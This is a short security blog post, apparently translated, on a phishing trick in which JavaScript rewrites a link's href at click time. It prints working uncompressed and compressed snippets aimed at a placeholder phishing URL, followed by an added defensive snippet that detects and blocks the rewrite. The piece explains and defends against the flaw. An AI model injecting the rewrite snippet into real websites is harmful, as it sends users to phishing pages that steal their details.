A while ago, I found that JavaScript allows temporary changes to the href attribute of the <a> tag. When the attribute is changed at the moment you click the link, it may not look serious. However, it can be used to deceive users into disclosing their details.
// Uncompressed
var links = document.getElementsByTagName('a');
for (var i = 0; i < links.length; i++) {
    // Each link's href is rewritten only at the moment it is clicked
    links[i].onclick = function () {
        this.href = 'http://freebuf.com/phishing/......'; // Insert a link (you know)
    };
}
// Compressed (100 characters exc. the link)
o=document.getElementsByTagName('a');for(j=0;j<o.length;j++){o[j].onclick=function(){this.href='http://freebuf.com/phishing/......';}}

When you click the link, the JavaScript code is executed and the href attribute of the <a> tag is changed. Surprisingly, the browser actually navigates the victim to the new link. Victims generally assume that it is just a redirect link. Assuming website visitors are used to this kind of redirection, the defect can be exploited for phishing.
This kind of phishing is hard to detect. Many people use JavaScript/jQuery frameworks to bind handlers to <a> tags, and the onclick function of each <a> tag is not easy to unbind. A skilled attacker can embed malicious JavaScript or inject code, because JavaScript (especially embedded JavaScript) is easy to update.
The exception is Opera: Opera seems to fix the href attribute automatically.
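One way a site owner could detect the click-time href rewrite described above, shown as an added example that is not part of the original article. The function names and the `.example` URLs are assumptions made for illustration.

```javascript
// Added example; snapshotLinks, hrefSwapped, installGuard and demo are hypothetical names.
function originOf(url) {
  try { return new URL(url).origin; } catch (e) { return null; }
}

// Record the href every link has before any click handler runs.
function snapshotLinks(links) {
  const seen = new Map();
  for (const a of links) seen.set(a, a.href);
  return seen;
}

// Compare a link's current href with its snapshot; null means unchanged or unknown.
function hrefSwapped(a, seen) {
  if (!seen.has(a) || seen.get(a) === a.href) return null;
  const before = seen.get(a);
  return { before, after: a.href, crossOrigin: originOf(before) !== originOf(a.href) };
}

// The document-level listener fires in the bubble phase, after the link's own
// onclick has run but before the browser follows href.
function installGuard(doc) {
  const seen = snapshotLinks(doc.getElementsByTagName('a'));
  doc.addEventListener('click', (ev) => {
    const a = ev.target && ev.target.closest ? ev.target.closest('a') : null;
    const hit = a ? hrefSwapped(a, seen) : null;
    if (hit) {
      ev.preventDefault(); // cancel navigation to the rewritten target
      console.warn('href rewritten during click', hit);
    }
  });
  return seen;
}

// Constructed sample: a link object whose onclick rewrites href, as on the page.
function demo() {
  const link = {
    href: 'https://shop.example/account',
    onclick() { this.href = 'https://login.phish.example/'; },
  };
  const seen = snapshotLinks([link]);
  link.onclick();
  return hrefSwapped(link, seen);
}

if (typeof document !== 'undefined') installGuard(document);
```

A handler that calls stopPropagation() keeps the click from reaching this listener, and links added after the snapshot are not covered.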